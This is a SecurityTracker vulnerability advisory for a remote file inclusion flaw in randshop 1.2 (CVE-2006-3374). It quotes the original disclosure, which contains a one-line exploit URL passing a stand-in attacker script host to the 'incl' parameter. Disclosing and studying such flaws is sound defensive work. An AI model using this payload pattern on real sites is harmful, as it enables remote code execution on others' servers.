SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   randshop Vendors:   randshop.com
randshop Include File Flaw in 'incl' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016438
SecurityTracker URL:  http://securitytracker.com/id/1016438
CVE Reference:   CVE-2006-3374   (Links to External Site)
Updated:  Aug 12 2008
Original Entry Date:  Jul 5 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.2 and prior versions
Description:   A vulnerability was reported in randshop. A remote user can include and execute arbitrary code on the target system.

The 'index.php' script does not properly validate user-supplied input in the 'incl' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

black-code reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.randshop.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  file include exploits in randshop v1.2

file include exploits in randshop v1.2
forum type : randshop v1.2
bug found by : black-code
team : site-down
type : file include

####################################################
Exploits :


http://www.example.com/randshop/index.php?incl=http://evilscript?

####################################################



#######################
emails:

black-cod3@hotmail.com  &  gamr-14@hotmail.com
#######################
Greetz to my friends : Shereba, Killer XxX, Crash_over_ride

All my respect to our friends , lezr.com , g123g.net


done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC